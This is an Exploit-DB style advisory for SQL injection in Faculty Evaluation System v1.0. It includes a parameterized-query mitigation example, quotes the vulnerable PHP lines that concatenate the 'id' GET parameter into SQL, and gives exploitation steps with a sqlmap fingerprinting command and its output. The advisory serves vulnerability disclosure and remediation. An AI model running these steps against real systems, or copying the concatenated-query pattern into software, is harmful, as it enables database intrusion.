Vendor: Faculty Evaluation System
By: Andrey Stoykov
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Faculty Evaluation System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Platforms Tested: Windows Server 2022
2023

Faculty Evaluation System v1.0 – SQL Injection

The Faculty Evaluation System v1.0 is vulnerable to SQL Injection in the 'edit_evaluation' file and the 'view_faculty.php' file. In both files the 'id' GET parameter is concatenated directly into a SQL query, which allows an attacker to manipulate the query and potentially extract or modify sensitive data.

Mitigation:

To mitigate this vulnerability, validate the input and use parameterized queries so that request data is never concatenated into SQL. Regular security audits and penetration testing can also help identify and address such vulnerabilities.
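
The mitigation above applied to the two 'id' lookups this entry lists, as an added example (not code from the application or from the advisory author). `fetch_row_by_id` is a hypothetical helper, `$conn` is assumed to be the application's existing mysqli connection, and `get_result()` assumes the mysqlnd driver.

```php
<?php
// Added example. Assumption: $conn is the application's existing mysqli connection.

/**
 * Hypothetical helper: fetch one row by integer key with a prepared statement.
 * $sql must contain exactly one "?" placeholder for the id.
 * Returns the row, or null when the id is invalid or no row matches.
 */
function fetch_row_by_id(mysqli $conn, string $sql, $rawId): ?array
{
    // Input validation: accept only a positive integer; arrays, null,
    // empty strings and anything with trailing characters are rejected.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false || $id === null) {
        return null;
    }

    // Parameterized query: the value is bound as an integer and sent
    // separately from the SQL text, so it cannot change the statement.
    $stmt = $conn->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('Failed to prepare statement');
    }
    $stmt->bind_param('i', $id);
    if (!$stmt->execute()) {
        $stmt->close();
        throw new RuntimeException('Failed to execute statement');
    }
    $row = $stmt->get_result()->fetch_array(); // requires mysqlnd
    $stmt->close();

    return is_array($row) ? $row : null;
}

// view_faculty.php: replaces the concatenated query on line #4.
$qry = fetch_row_by_id(
    $conn,
    "SELECT *, concat(firstname,' ',lastname) AS name FROM faculty_list WHERE id = ?",
    $_GET['id'] ?? null
);
// edit_evaluation: same helper with "SELECT * FROM ratings WHERE id = ?".

if ($qry === null) {
    // Fail closed instead of continuing with an empty record.
    http_response_code(404);
    exit('Record not found');
}
```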

Exploit-DB raw data:

# Exploit Title: Faculty Evaluation System v1.0 - SQL Injection
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip
# Version: 1.0
# Tested on: Windows Server 2022


SQLi #1

File: edit_evaluation

Line #4
$qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array();
[...]


SQLi #2

File: view_faculty.php

Line #4

// Add "id" parameter after "view_faculty" parameter then add equals "id" with integer
[...]
$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();
[...]


Steps to Exploit:

1. Login to application
2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1"
3. Copy request to intercept proxy to file
4. Exploit using SQLMap


sqlmap -r test.txt  --threads 1 --dbms=mysql --fingerprint

[...]
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
[INFO] actively fingerprinting MySQL
[INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.6.49
               fork fingerprint: MariaDB
[...]